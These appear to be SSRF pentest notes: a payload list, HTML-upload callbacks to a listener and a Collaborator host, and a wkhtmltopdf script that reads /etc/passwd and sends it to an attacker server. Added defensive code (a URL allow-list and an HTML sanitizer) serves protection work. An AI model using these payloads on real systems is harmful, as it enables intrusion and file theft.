Server-Side Request Forgery (SSRF)

Basic SSRF payloads

file:///etc/passwd
http://127.0.0.1
http://127.0.0.1:5000
http://127.0.0.1:1
index.html
index.php
http::////127.0.0.1:1
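Defensive counterpart to the payload list above, added here and not part of the original notes: a URL check a server can run before fetching anything on a user's behalf. It refuses every shape listed (the file scheme, loopback and other internal IP literals, the malformed http:://// form, bare relative paths) and also hostnames that resolve to internal ranges. The fake DNS table, the hostnames in it and the example IPs are constructed for the illustration; the real resolver is only used when no resolver is injected.

```python
"""Allow-list check for URLs a server is asked to fetch on a user's behalf.
Added illustration for these notes, not code from any project."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def ip_is_internal(ip: str) -> bool:
    """True for loopback, private (RFC 1918 / ULA), link-local, multicast,
    unspecified (0.0.0.0) and reserved ranges."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_unspecified or addr.is_reserved)


def dns_resolve(host: str) -> list[str]:
    """Real resolver: every address getaddrinfo returns for the host.
    getaddrinfo also accepts numeric spellings such as '2130706433' or
    '0x7f000001' and yields 127.0.0.1 for them, so those are caught as well."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def check_fetch_url(url: str, resolver=dns_resolve) -> tuple[bool, str]:
    """Return (allowed, reason). Only http/https to a host whose *every*
    resolved address is public passes; anything else is refused."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"   # file:, gopher:, none
    host = parts.hostname
    if not host:
        return False, "no host in URL"       # 'index.html', 'http::////127.0.0.1:1'
    if parts.username or parts.password:
        return False, "credentials in URL"   # http://user@host forms confuse parsers
    try:
        ips = [str(ipaddress.ip_address(host))]   # literal IP, including [::1]
    except ValueError:
        ips = resolver(host)                      # hostname: look at what it maps to
    if not ips:
        return False, f"{host!r} does not resolve"
    for ip in ips:
        if ip_is_internal(ip):
            return False, f"{host!r} maps to internal address {ip}"
    return True, "ok"


# Constructed fake DNS table so the example runs offline (hostnames are hypothetical).
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "intranet.corp": ["10.0.0.5"],          # internal host: must be refused
    "metadata.local": ["169.254.169.254"],  # link-local: must be refused
}


def fake_resolve(host: str) -> list[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ["file:///etc/passwd", "http://127.0.0.1:5000", "http://127.0.0.1:1",
              "index.html", "http::////127.0.0.1:1", "http://[::1]/",
              "http://intranet.corp/", "http://metadata.local/latest/",
              "https://example.com/report.pdf"]:
        print(f"{u:40} -> {check_fetch_url(u, fake_resolve)}")
```

Two caveats the check itself cannot cover: the resolved address must be the one actually connected to (resolve once, pin the IP, or re-check at connect time, otherwise a short-TTL record can change between check and fetch), and redirects must either be disabled or re-checked hop by hop, since a public host can 302 to an internal one.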

Blind SSRF

HTML File Upload To SSRF

Make an HTML file with the following code:

<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://<SERVICE IP>:PORT/x?=viaimgtag">
</body>
</html>

Upload this file and see if you get a hit on your netcat listener.

I got a hit on my netcat listener

Using Burp Collaborator

Use the code below in the HTML file:

<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://oldac4hch7f4k2reoc7cyj3y7pdg17pw.oastify.com/x?=viaimgtag">
</body>
</html>

wkhtmltopdf Blind SSRF Exploit

By inspecting the request, we notice wkhtmltopdf in the User-Agent. If we browse wkhtmltopdf's downloads webpage, the below statement catches our attention:

Do not use wkhtmltopdf with any untrusted HTML – be sure to sanitize any user-supplied HTML/JS; otherwise, it can lead to the complete takeover of the server it is running on! Please read the project status for the gory details.

So we can execute JavaScript in wkhtmltopdf. Let us leverage this to read a local file by creating the following HTML document:

<html>
    <body>
        <b>Exfiltration via Blind SSRF</b>
        <script>
        var readfile = new XMLHttpRequest(); // Read the local file
        var exfil = new XMLHttpRequest();    // Send the file to our server
        readfile.open("GET", "file:///etc/passwd", true);
        readfile.send();
        readfile.onload = function() {
            if (readfile.readyState === 4) {
                var url = 'http://<SERVICE IP>:<PORT>/?data=' + btoa(this.response);
                exfil.open("GET", url, true);
                exfil.send();
            }
        }
        readfile.onerror = function() { document.write('<a>Oops!</a>'); }
        </script>
    </body>
</html>

In this case, we are using two XMLHttpRequest objects, one for reading the local file and another for sending it to our server. We also use the btoa function so the data travels Base64-encoded in the query string.
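Mitigation for both techniques in these notes (the uploaded HTML whose img tag makes the renderer call out, and the wkhtmltopdf script that reads file:///etc/passwd and posts it off), added here and not code from wkhtmltopdf or any project: a sanitizer built on the standard-library HTML parser that removes script and other active elements, event-handler and style attributes, and any src-style attribute that is not an inline data: image or an https URL to an allow-listed host. The allow-listed host, the sample documents and the 10.0.0.5 placeholder are constructed for the example.

```python
"""Strip active content and off-site resource loads from user-supplied HTML
before a server-side renderer (wkhtmltopdf or similar) touches it.
Added illustration for these notes; not code from wkhtmltopdf or any project."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements that run code, embed documents or load stylesheets: removed with their content.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "frame", "frameset"}
DROP_TAG_ONLY = {"link", "meta", "base", "form"}               # tag removed, children kept
URL_ATTRS = {"src", "srcset", "background", "poster", "data"}  # attributes the renderer fetches
ALLOWED_IMAGE_HOSTS = {"cdn.example.internal"}                 # hypothetical allow-list


def allow_src(value: str) -> bool:
    """Inline data: images and https URLs to allow-listed hosts only.
    file://, http://<ip>:<port>, protocol-relative and javascript: values fail."""
    v = value.strip()
    if v.lower().startswith("data:image/"):
        return True
    parts = urlsplit(v)
    return parts.scheme.lower() == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__()            # convert_charrefs=True: text arrives decoded
        self.out = []                 # rebuilt document
        self.dropped = []             # audit trail for logging
        self.skip_depth = 0           # >0 while inside a DROP_WITH_CONTENT element

    def handle_decl(self, decl):
        if not self.skip_depth:
            self.out.append(f"<!{decl}>")

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            self.dropped.append(f"<{tag}> removed with content")
            return
        if tag in DROP_TAG_ONLY:
            self.dropped.append(f"<{tag}> removed")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name == "style":      # handlers, CSS url() loads
                self.dropped.append(f"{tag}@{name} removed")
            elif name in URL_ATTRS and not allow_src(value):
                self.dropped.append(f"{tag}@{name}={value!r} blocked")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):        # <img ... /> style
        if tag in DROP_WITH_CONTENT:
            self.dropped.append(f"<{tag}/> removed")
        else:
            self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag not in DROP_TAG_ONLY:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):                  # conditional comments can smuggle markup
        self.dropped.append("comment removed")


def sanitize_html(document: str) -> tuple[str, list[str]]:
    """Return (clean_html, list_of_removed_items)."""
    p = Sanitizer()
    p.feed(document)
    p.close()
    return "".join(p.out), p.dropped


# Constructed samples shaped like the two payloads in these notes (placeholder IP).
UPLOADED_IMG = ('<!DOCTYPE html>\n<html><body><a>Hello World!</a>'
                '<img src="http://10.0.0.5:8000/x?=viaimgtag"></body></html>')
EXFIL_SCRIPT = ('<html><body><b>Exfiltration via Blind SSRF</b><script>'
                'var readfile = new XMLHttpRequest();</script></body></html>')
OK_IMG = '<p><img src="https://cdn.example.internal/logo.png" alt="logo"></p>'

if __name__ == "__main__":
    for doc in (UPLOADED_IMG, EXFIL_SCRIPT, OK_IMG):
        clean, removed = sanitize_html(doc)
        print(clean, removed, sep="\n  ")
```

Sanitizing is one layer: the renderer should also be started with JavaScript and local file access switched off (wkhtmltopdf has --disable-javascript and --disable-local-file-access for this) and run somewhere that cannot reach internal addresses, so that anything the sanitizer misses still has nowhere to go.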
